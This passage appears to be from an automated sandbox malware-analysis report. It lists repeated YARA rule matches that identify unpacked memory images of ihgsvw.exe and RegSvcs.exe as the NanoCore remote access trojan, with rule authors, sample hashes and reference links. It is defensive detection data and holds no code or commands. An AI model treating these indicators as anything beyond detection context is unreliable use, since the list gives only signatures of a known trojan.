      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
